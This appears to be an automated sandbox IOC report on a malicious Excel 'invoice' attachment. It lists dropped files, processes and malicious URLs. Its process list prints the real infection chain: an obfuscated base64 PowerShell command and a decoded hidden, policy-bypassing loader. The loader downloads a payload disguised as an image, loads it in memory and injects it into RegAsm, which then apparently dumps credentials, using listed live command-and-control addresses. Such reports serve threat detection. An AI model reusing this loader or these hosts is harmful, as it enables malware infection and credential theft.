IOC Report
August Shipment - Inv No. 041.xls

loading gif

Files

File Path
Type
Category
Malicious
August Shipment - Inv No. 041.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 08:00:15 2024, Security: 1
initial sample
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter[1].doc
Rich Text Format data, version 1
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F3AD743.doc
Rich Text Format data, version 1
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{25DA551D-57C7-4B7F-89C3-ACFA37B5F42F}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
 malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\GQ1oBm.url
MS Windows 95 Internet shortcut text (URL=<https://a38.fr/GQ1oBm>), ASCII text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\a38.fr.url
MS Windows 95 Internet shortcut text (URL=<https://a38.fr/>), ASCII text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\Users\user\Desktop\August Shipment - Inv No. 041.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 13:01:03 2024, Security: 1
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\weneedsmoothbunwithbutterchoco[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D9533BB.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC58BE22.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3E7F476.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0FFE4D56-763C-4DEC-B2DD-7C7753AA335F}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6A095A80-6561-4EAF-8A05-0E7796E2A7ED}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\bhvB5B9.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x208b021f, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\eibgqlhhydk
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\gcrftmnn.yfz.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\loat\logs.dat
data
dropped
C:\Users\user\AppData\Local\Temp\oaycnkig.nqr.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ogwzvj2i.czq.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\xdtokpmw.ecr.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\{1A3F9F8E-ABF6-4622-B154-0719FDCD3916}
data
dropped
C:\Users\user\AppData\Local\Temp\{44CE368B-1960-4D77-98B9-48C1CD596D40}
data
dropped
C:\Users\user\AppData\Local\Temp\~DF3475951C07186DC7.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF7D504418A9804062.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFA500F612B4DBFF60.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [xls]
modified
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\C9730000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 13:01:03 2024, Security: 1
dropped
C:\Users\user\Desktop\C9730000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
There are 24 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
 malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
 malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
 malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBG? ? ? ? ?EM? ? ? ? ?QgBS? ? ? ? ?C8? ? ? ? ?Nw? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?5? ? ? ? ?C4? ? ? ? ?N? ? ? ? ?? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Lg? ? ? ? ?0? ? ? ? ?Dg? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?Dc? ? ? ? ?Mw? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\eibgqlhhydk"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\pcgrqdsjmlcrsdy"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zeljrwdcztuwukmaun"
 malicious

URLs

Name
IP
Malicious
https://ia803104.us.archive.org
unknown
 malicious
http://137.184.234.91/77/RBCF.txt
137.184.234.91
 malicious
45.90.89.98
malicious
http://137.184.234.91/77/cn/weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter.doc
137.184.234.91
 malicious
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
207.241.232.154
 malicious
http://137.184.234.91/77/weneedsmoothbunwithbutterchoco.tIF
137.184.234.91
 malicious
http://b.scorecardresearch.com/beacon.js
unknown
http://acdn.adnxs.com/ast/ast.js
unknown
http://www.imvu.comr
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
unknown
http://137.184.234.91
unknown
http://ocsp.entrust.net03
unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
unknown
https://contoso.com/License
unknown
https://support.google.com/chrome/?p=plugin_flash
unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
unknown
http://www.nirsoft.net
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
unknown
https://a38.fr/GQ1oBmJ
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://cache.btrll.com/default/Pix-1x1.gif
unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
unknown
https://www.google.com
unknown
http://geoplugin.net/json.gp/C
unknown
http://o.aolcdn.com/ads/adswrappermsni.js
unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
unknown
http://www.msn.com/?ocid=iehp
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
unknown
http://static.chartbeat.com/js/chartbeat.js
unknown
http://www.msn.com/de-de/?ocid=iehp
unknown
http://137.184.234.91/77/weneedsmoothbunwithbutterchoco.tIFC:
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
unknown
https://login.yahoo.com/config/login
unknown
http://www.nirsoft.net/
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://ia803104.us.archive.org/27/items/vbs_20240LR
unknown
